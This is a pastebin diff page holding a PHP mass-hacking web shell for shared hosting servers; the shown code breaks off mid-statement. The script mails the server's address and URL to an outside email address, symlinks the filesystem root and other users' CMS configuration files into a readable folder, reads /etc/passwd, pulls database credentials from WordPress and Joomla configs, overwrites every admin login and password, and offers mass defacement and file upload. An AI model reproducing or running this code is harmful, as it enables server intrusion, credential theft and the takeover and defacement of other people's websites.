API tools faq
paste
View difference between Paste ID: SuwH4D9y and rRKgWMqk
SHOW: | | - or go back to the newest paste.
1
<STYLE>
2
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid
3
4
#000000;}

5
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 

6
7
1px solid #666666;height:20}

8
body {

9
font-family: Tahoma

10
}

11
tr {

12
BORDER: dashed 1px #333;

13
color: #FFF;

14
}

15
td {

16
BORDER: dashed 1px #333;

17
color: #FFF;

18
}

19
.table1 {

20
BORDER: 0px Black;

21
BACKGROUND-COLOR: Black;

22
color: #FFF;

23
}

24
.td1 {

25
BORDER: 0px;

26
BORDER-COLOR: #333333;

27
font: 7pt Verdana;

28
color: Green;

29
}

30
.tr1 {

31
BORDER: 0px;

32
BORDER-COLOR: #333333;

33
color: #FFF;

34
}

35
table {

36
BORDER: dashed 1px #333;

37
BORDER-COLOR: #333333;

38
BACKGROUND-COLOR: Black;

39
color: #FFF;

40
}

41
input {

42
border			: dashed 1px;

43
border-color		: #333;

44
BACKGROUND-COLOR: Black;

45
font: 8pt Verdana;

46
color: Red;

47
}

48
select {

49
BORDER-RIGHT:  Black 1px solid;

50
BORDER-TOP:    #DF0000 1px solid;

51
BORDER-LEFT:   #DF0000 1px solid;

52
BORDER-BOTTOM: Black 1px solid;

53
BORDER-color: #FFF;

54
BACKGROUND-COLOR: Black;

55
font: 8pt Verdana;

56
color: Red;

57
}

58
submit {

59
BORDER:  buttonhighlight 2px outset;

60
BACKGROUND-COLOR: Black;

61
width: 30%;

62
color: #FFF;

63
}

64
textarea {

65
border			: dashed 1px #333;

66
BACKGROUND-COLOR: Black;

67
font: Fixedsys bold;

68
color: #999;

69
}

70
BODY {

71
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: 

72
73
#FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF

74
margin: 1px;

75
color: Red;

76
background-color: Black;

77
}

78
.main {

79
margin			: -287px 0px 0px -490px;

80
BORDER: dashed 1px #333;

81
BORDER-COLOR: #333333;

82
}

83
.tt {

84
background-color: Black;

85
}

86
87
A:link {

88
	COLOR: White; TEXT-DECORATION: none

89
}

90
A:visited {

91
	COLOR: White; TEXT-DECORATION: none

92
}

93
A:hover {

94
	color: Red; TEXT-DECORATION: none

95
}

96
A:active {

97
	color: Red; TEXT-DECORATION: none

98
}

99
</STYLE>

100
101
<?php

102
set_time_limit(0);

103
error_reporting(0);

104
105
$url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

106
107
mail('[email protected]',$_SERVER['SERVER_ADDR'],$url);

108
109
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);

110
111
112
113
##.htaccess

114
@mkdir('pee',0777);

115
@symlink("/","pee/root");

116
@fopen('temp.txt','w');

117
$htaccss = "Options all 

118
 DirectoryIndex Sux.html 

119
 AddType text/plain .php 

120
 AddHandler server-parsed .php 

121
  AddType text/plain .html 

122
 AddHandler txt .html 

123
 Require None 

124
 Satisfy Any";

125
 

126
file_put_contents("pee/.htaccess",$htaccss);

127
128
if(is_readable("/var/named")){

129
$list = scandir("/var/named");

130
$current_dir = posix_getcwd();

131
$dir = explode("/",$current_dir);

132
foreach($list as $domain){

133
if(strpos($domain,".db"))

134
{

135
	$domain = str_replace('.db','',$domain);

136
	$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));

137
	

138
error_reporting(0);

139
140
$current_dir = posix_getcwd();

141
$dir = explode("/",$current_dir);

142
143
symlink($owner['dir'].'/'.$dir[3].'/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');

144
symlink($owner['dir'].'/'.$dir[3].'/blog/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');

145
symlink($owner['dir'].'/'.$dir[3].'/wp/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');

146
symlink($owner['dir'].'/'.$dir[3].'/site/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');

147
symlink($owner['dir'].'/'.$dir[3].'/config.php',"pee/".$owner['name'].'-PhpBB.txt');

148
symlink($owner['dir'].'/'.$dir[3].'/includes/config.php',"pee/".$owner['name'].'-vBulletin.txt');

149
symlink($owner['dir'].'/'.$dir[3].'/configuration.php',"pee/".$owner['name'].'-Joomla.txt');

150
symlink($owner['dir'].'/'.$dir[3].'/web/configuration.php',"pee/".$owner['name'].'-Joomla.txt');

151
symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"pee/".$owner['name'].'-Joomla.txt');

152
symlink($owner['dir'].'/'.$dir[3].'/site/configuration.php',"pee/".$owner['name'].'-Joomla.txt');

153
symlink($owner['dir'].'/'.$dir[3].'/conf_global.php',"pee/".$owner['name'].'-IPB.txt');

154
symlink($owner['dir'].'/'.$dir[3].'/inc/config.php',"pee/".$owner['name'].'-MyBB.txt');

155
symlink($owner['dir'].'/'.$dir[3].'/Settings.php',"pee/".$owner['name'].'-SMF.txt');

156
symlink($owner['dir'].'/'.$dir[3].'/sites/default/settings.php',"pee/".$owner['name'].'-Drupal.txt');

157
symlink($owner['dir'].'/'.$dir[3].'/e107_config.php',"pee/".$owner['name'].'-e107.txt');

158
symlink($owner['dir'].'/'.$dir[3].'/datas/config.php',"pee/".$owner['name'].'-Seditio.txt');

159
symlink($owner['dir'].'/'.$dir[3].'/includes/configure.php',"pee/".$owner['name'].'-osCommerce.txt');

160
symlink($owner['dir'].'/'.$dir[3].'/client/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

161
symlink($owner['dir'].'/'.$dir[3].'/clientes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

162
symlink($owner['dir'].'/'.$dir[3].'/support/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

163
symlink($owner['dir'].'/'.$dir[3].'/supportes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

164
symlink($owner['dir'].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

165
symlink($owner['dir'].'/'.$dir[3].'/domain/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

166
symlink($owner['dir'].'/'.$dir[3].'/hosting/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

167
symlink($owner['dir'].'/'.$dir[3].'/whmc/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

168
symlink($owner['dir'].'/'.$dir[3].'/billing/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

169
symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

170
symlink($owner['dir'].'/'.$dir[3].'/order/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

171
symlink($owner['dir'].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

172
symlink($owner['dir'].'/'.$dir[3].'/domains/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');

173
174
$link = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';

175
176
if(chk_header($link))

177
	{

178
		$str = '<tr><td>'.$domain.'</td><td>'.$owner['name'].'</td><td>/WordPress</td>'.Chr(10);

179
		file_put_contents("temp.txt",$str,FILE_APPEND);

180
	}

181
182
183
184
185
}

186
}

187
}

188
189
$etc = file_get_contents("/etc/passwd");

190
$etcz = explode("\n",$etc);

191
192
foreach($etcz as $etz){

193
$etcc = explode(":",$etz);

194
error_reporting(0);

195
196
$current_dir = posix_getcwd();

197
$dir = explode("/",$current_dir);

198
199
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');

200
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');

201
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');

202
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');

203
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','pee/'.$etcc[0].'-PhpBB.txt');

204
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','pee/'.$etcc[0].'-vBulletin.txt');

205
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','pee/'.$etcc[0].'-Joomla.txt');

206
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','pee/'.$etcc[0].'-Joomla.txt');

207
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','pee/'.$etcc[0].'-Joomla.txt');

208
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','pee/'.$etcc[0].'-Joomla.txt');

209
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','pee/'.$etcc[0].'-IPB.txt');

210
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','pee/'.$etcc[0].'-MyBB.txt');

211
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','pee/'.$etcc[0].'-SMF.txt');

212
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','pee/'.$etcc[0].'-Drupal.txt');

213
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','pee/'.$etcc[0].'-e107.txt');

214
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','pee/'.$etcc[0].'-Seditio.txt');

215
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','pee/'.$etcc[0].'-osCommerce.txt');

216
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

217
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

218
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

219
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

220
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

221
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

222
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

223
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

224
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

225
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

226
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

227
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

228
symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');

229
if(chk_header($link))

230
	{

231
		$str = '<tr><td></td><td>'.$etcc[0].'</td><td>/WordPress</td>'.Chr(10);

232
		file_put_contents("temp.txt",$str,FILE_APPEND);

233
	}

234
}

235
236
237
238
239
function chk_header($link){

240
$pee = get_headers($link,1);

241
if(strpos($pee[0],"200")){

242
return true;

243
}else{ return false; }

244
}

245
246
function Find($str,$start,$end){

247
$len = strlen($str);

248
$start_pos = (strpos($str,$start) + strlen($start));

249
$str = substr($str,$start_pos);

250
$end_pos = strpos($str,$end);

251
$str = substr($str,0,$end_pos);

252
return $str;    

253
}

254
255
$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];

256
$u = explode("/",$pageURL );

257
$pageURL =str_replace($u[count($u)-1],"",$pageURL );

258
259
260
#######

261
function cms_add($link,$domain,$owner,$cms)

262
{

263
	

264
	$link = $link.'-'.$cms.'.txt';

265
	if(chk_header($link))

266
	{

267
		$url = 'http://'.$domain;

268
		$str = '<tr><td> <a href='.$url.'>'.$domain.'</a></td><td>'.$owner.'</td><td><a 

269
270
href='.$link.'>'.$cms.'</td>'.Chr(10);

271
		file_put_contents("pee.tmp",$str,FILE_APPEND);

272
		echo $str;

273
		

274
	}

275
}

276
277
function CurlPage($url,$post = null,$head = true) {

278
$ch = curl_init();

279
curl_setopt($ch, CURLOPT_URL, $url);

280
curl_setopt($ch, CURLOPT_HEADER, $head); 

281
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

282
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

283
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);

284
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);

285
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

286
287
curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt"); 

288
curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");

289
290
If ($post != NULL){

291
curl_setopt($ch, CURLOPT_POST, 1);

292
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

293
}

294
$urlPage = curl_exec($ch);

295
296
if(curl_errno($ch)){

297
echo curl_error($ch);

298
}

299
300
curl_close($ch);

301
return($urlPage);

302
}

303
304
305
306
function listall($file,$str){

307
if(file_exists($file)){

308
$do = file_get_contents($file);

309
if(!strpos($do,$str)){

310
file_put_contents($file,$str,FILE_APPEND);

311
}

312
}else{

313
file_put_contents($file,$str,FILE_APPEND);

314
}

315
}

316
317
318
319
echo "<center>

320
321
<img src='http://sphotos-f.ak.fbcdn.net/hphotos-ak-prn1/65176_115131175320548_863165804_n.jpg'><br>

322
[ <a href='?do=cms_detect'>./CmsDetector~</a> ] -- [ <a href='?do=pass_change'>./MassPASSChange~</a> ] -- [ <a 

323
324
href='?do=wp_def'>./Wp Mass Defacer</a> ] -- [ <a href='?do=uploader'>./Uploader</a> ] -- [ <a href='?do=wp_up'>c00ming 

325
326
s00n</a> ]<br><br><br></center> ";

327
328
if(isset($_REQUEST['do'])){ 

329
switch ($_REQUEST['do']){

330
331
################CMS DETECTOR

332
case 'cms_detect':

333
334
if(!file_exists('pee.tmp')){

335
@fopen('pee.tmp', 'w');

336
337
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';

338
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';

339
340
$p = 0;

341
342
if(is_readable("/var/named")){

343
$list = scandir("/var/named");

344
$current_dir = posix_getcwd();

345
$dir = explode("/",$current_dir);

346
foreach($list as $domain){

347
if(strpos($domain,".db"))

348
{

349
	$domain = str_replace('.db','',$domain);

350
	$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));

351
	

352
error_reporting(0);

353
354
$link = $pageURL.'pee/'.$owner['name'];

355
356
cms_add($link,$domain,$owner['name'],"WordPress");

357
cms_add($link,$domain,$owner['name'],"Joomla");

358
cms_add($link,$domain,$owner['name'],"vBulletin");

359
cms_add($link,$domain,$owner['name'],"WHMCS");

360
cms_add($link,$domain,$owner['name'],"PhpBB");

361
cms_add($link,$domain,$owner['name'],"MyBB");

362
cms_add($link,$domain,$owner['name'],"IPB");

363
cms_add($link,$domain,$owner['name'],"SMF");

364
cms_add($link,$domain,$owner['name'],"Drupal");

365
cms_add($link,$domain,$owner['name'],"e107");

366
cms_add($link,$domain,$owner['name'],"Seditio");

367
cms_add($link,$domain,$owner['name'],"osCommerce");

368
369
}

370
}

371
}

372
}else{

373
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';

374
echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';

375
$content = file_get_contents($pageURL.'pee.tmp');

376
echo $content;

377
}

378
break;

379
380
381
382
################MASS DEFACE

383
case 'pass_change':

384
385
echo <<<PEE

386
<form method='POST'>

387
<center>

388
USER : <input size='20' value='doomtimy' name='user' type='text'><br>

389
PASS : <input size='20' value='ahscrew' name='pass' type='text'>

390
<br>

391
<input value='Change' name='' type='submit'><br><br>

392
</form>

393
394
PEE;

395
396
if($_POST){

397
################### USER & PASS ################

398
$user = $_POST['user'];

399
$pass = $_POST['pass'];

400
################################################

401
402
403
if(is_readable("/var/named"))

404
{

405
	

406
	echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';

407
	echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';

408
	$list = scandir("/var/named");

409
	foreach($list as $domain){

410
	if(strpos($domain,".db"))

411
	{

412
		$domain = str_replace('.db','',$domain);

413
		$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));

414
		$url = 'http://'.$domain;

415
		if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))

416
		{ 

417
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';

418
			

419
			file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');

420
			##GET DATABASE INFO FROM CONFIGURATION FILE

421
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');

422
			$hostname = Find($cnf,"define('DB_HOST', '","');");

423
			$username = Find($cnf,"define('DB_USER', '","');");

424
			$password = Find($cnf,"define('DB_PASSWORD', '","');");

425
			$dbname = Find($cnf,"define('DB_NAME', '","');");

426
			$prefix = Find($cnf,"table_prefix  = '","'");

427
			

428
			$link=mysql_connect($hostname,$username,$password);

429
			

430
			if ($link) 

431
			{

432
				$hash = crypt($pass);

433
				mysql_select_db($dbname,$link) ;

434
				$tab = $prefix.'users';			

435
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");

436
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");

437
				$req =@mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");

438
				$data = mysql_fetch_array($req);

439
				$site_url=$data["option_value"];

440
				

441
				error_reporting(0);

442
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

443
444
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font 

445
446
color="green">success..</font></td>';

447
				

448
			}else{

449
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

450
451
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql 

452
453
fail</font></td>';

454
			}

455
		

456
			

457
		

458
		

459
		}

460
		

461
		

462
		

463
		elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt'))

464
		{ 

465
		

466
		##GET DATABASE INFO FROM CONFIGURATION FILE

467
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt');

468
			$config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';

469
			

470
			if(preg_match('%(JConfig|mosConfig)%',$cnf)){

471
			

472
			######

473
			if(preg_match('%JConfig%', $cnf)){

474
			$username=Find($cnf,"\$user = '","'");

475
			$password=Find($cnf,"\$password = '","'");

476
			$dbname=Find($cnf,"\$db = '","'");

477
			$prefix=Find($cnf,"\$dbprefix = '","'");

478
			

479
			

480
			$link=mysql_connect("localhost",$username,$password);

481
			

482
			if ($link) 

483
			{

484
				$hash = md5($user);

485
				mysql_select_db($dbname,$link) ;

486
				$tab = $prefix.'users';			

487
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");

488
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");

489
				

490
			echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

491
492
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 

493
494
color="green">success..</font><br>';

495
496
			}else{

497
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

498
499
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 

500
501
fail</font></td>';

502
			}

503
			

504
			}

505
			

506
			#####

507
			elseif(preg_match('%mosConfig%',$cnf)){

508
			$username=Find($cnf,"\$mosConfig_user = '","'");

509
			$password=Find($cnf,"\$mosConfig_password = '","'");

510
			$dbname=Find($cnf,"\$mosConfig_db = '","'");

511
			$prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");

512
			$pwd = md5($npass);

513
			

514
			$link=mysql_connect("localhost",$username,$password);

515
			

516
			if ($link) 

517
			{

518
				$hash = md5($pass);

519
				mysql_select_db($dbname,$link) ;

520
				$tab = $prefix.'users';			

521
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");

522
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");

523
				

524
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

525
526
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 

527
528
color="green">success..</font><br>';

529
530
			}else{

531
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

532
533
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 

534
535
fail</font></td>';

536
			}

537
			

538
			}

539
			

540
			

541
			}

542
			#########

543
			

544
			

545
		}

546
	}

547
}

548
}

549
550
elseif(is_readable("/etc/passwd")){

551
552
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';

553
echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';

554
			

555
foreach($etcz as $etz){

556
$etcc = explode(":",$etz);

557
558
559
if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt'))

560
		{ 

561
			

562
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';

563
			file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');

564
			##GET DATABASE INFO FROM CONFIGURATION FILE

565
			$cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');

566
			$hostname = Find($cnf,"define('DB_HOST', '","');");

567
			$username = Find($cnf,"define('DB_USER', '","');");

568
			$password = Find($cnf,"define('DB_PASSWORD', '","');");

569
			$dbname = Find($cnf,"define('DB_NAME', '","');");

570
			$prefix = Find($cnf,"table_prefix  = '","'");

571
			

572
			$link=mysql_connect($hostname,$username,$password);

573
			

574
			if ($link) 

575
			{

576
				

577
				$hash = crypt($user);

578
				mysql_select_db($dbname,$link) ;

579
				$req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");

580
				$data = mysql_fetch_array($req);

581
				$site_url=$data["option_value"];

582
				$tab = $prefix.'users';			

583
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");

584
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");

585
				

586
				error_reporting(0);

587
				

588
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

589
590
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font 

591
592
color="green">success..</font><br>';

593
594
			}else{

595
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

596
597
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql 

598
599
fail</font></td>';

600
			}

601
		

602
			

603
		

604
		

605
		}

606
		

607
		

608
		

609
		elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt'))

610
		{ 

611
		

612
		##GET DATABASE INFO FROM CONFIGURATION FILE

613
			$cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt');

614
			$config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';

615
			

616
			if(preg_match('%(JConfig|mosConfig)%',$cnf)){

617
			

618
			######

619
			if(preg_match('%JConfig%', $cnf)){

620
			$username=Find($cnf,"\$user = '","'");

621
			$password=Find($cnf,"\$password = '","'");

622
			$dbname=Find($cnf,"\$db = '","'");

623
			$prefix=Find($cnf,"\$dbprefix = '","'");

624
			$site_url = Find($cnf,"\$mailfrom = '","'");

625
			$site_url = explode("@",$site_url);

626
			

627
			

628
			

629
			$link=mysql_connect("localhost",$username,$password);

630
			

631
			if ($link) 

632
			{

633
				$hash = md5($pass);

634
				mysql_select_db($dbname,$link) ;

635
				$tab = $prefix.'users';			

636
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");

637
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");

638
			echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

639
640
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 

641
642
color="green">success..</font><br>';

643
644
			}else{

645
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

646
647
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 

648
649
fail</font></td>';

650
			}

651
			

652
			}

653
			

654
			#####

655
			elseif(preg_match('%mosConfig%',$cnf)){

656
			$username=Find($cnf,"\$mosConfig_user = '","'");

657
			$password=Find($cnf,"\$mosConfig_password = '","'");

658
			$dbname=Find($cnf,"\$mosConfig_db = '","'");

659
			$prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");

660
			$site_url = Find($cnf,"\$mailfrom = '","'");

661
			$site_url = explode("@",$site_url);

662
			

663
			$link=mysql_connect("localhost",$username,$password);

664
			

665
			if ($link) 

666
			{

667
				$hash = md5($pass);

668
				mysql_select_db($dbname,$link) ;

669
				$tab = $prefix.'users';			

670
				$query2   = @mysql_query("UPDATE `$tab`  SET `username` ='$user'");

671
 				$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='$hash'");

672
				

673
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

674
675
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font 

676
677
color="green">success..</font><br>';

678
679
			}else{

680
				echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

681
682
false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql 

683
684
fail</font></td>';

685
			}

686
			

687
			}

688
			

689
			

690
			}

691
			#########

692
			

693
			

694
		}

695
	}

696
}

697
}

698
699
700
break;

701
702
703
704
705
706
707
708
709
710
711
################MASS DEFACE

712
case 'wp_def':

713
714
715
################### USER & PASS ################

716
$user = 'admin';

717
$pass = 'foo';

718
################################################

719
720
echo <<<PEE

721
<div align="center">

722
<form action="" method="POST">

723
724
<label>Deface URL: </label> <input type="text" style="width:450px;" name="deface_page"><br />

725
<input type="submit" value="DEFACE">

726
</form>

727
728
PEE;

729
730
if($_POST){ 

731
$deface = file_get_contents(trim($_POST['deface_page']));

732
733
if(is_readable("/var/named"))

734
{

735
	

736
	echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';

737
	echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td><td>DEF URL</td>';

738
	$list = scandir("/var/named");

739
	foreach($list as $domain){

740
	if(strpos($domain,".db"))

741
	{

742
		$domain = str_replace('.db','',$domain);

743
		$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));

744
		$url = 'http://'.$domain;

745
		if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))

746
		{ 

747
			$config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';

748
			

749
			file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');

750
			##GET DATABASE INFO FROM CONFIGURATION FILE

751
			$cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');

752
			$hostname = Find($cnf,"define('DB_HOST', '","');");

753
			$username = Find($cnf,"define('DB_USER', '","');");

754
			$password = Find($cnf,"define('DB_PASSWORD', '","');");

755
			$dbname = Find($cnf,"define('DB_NAME', '","');");

756
			$prefix = Find($cnf,"table_prefix  = '","'");

757
			

758
			$link=mysql_connect($hostname,$username,$password);

759
			

760
			if ($link) 

761
			{

762
				$hash = crypt($pass);

763
				mysql_select_db($dbname,$link) ;

764
				$tab = $prefix.'users';			

765
				$query2   = @mysql_query("UPDATE `$tab`  SET `user_login` ='$user'");

766
 				$query3  = @mysql_query("UPDATE `$tab`  SET `user_pass` ='$hash'");

767
				$req =@mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");

768
				$data = mysql_fetch_array($req);

769
				$site_url=$data["option_value"];

770
				

771
				error_reporting(0);

772
				

773
				

774
		echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return 

775
776
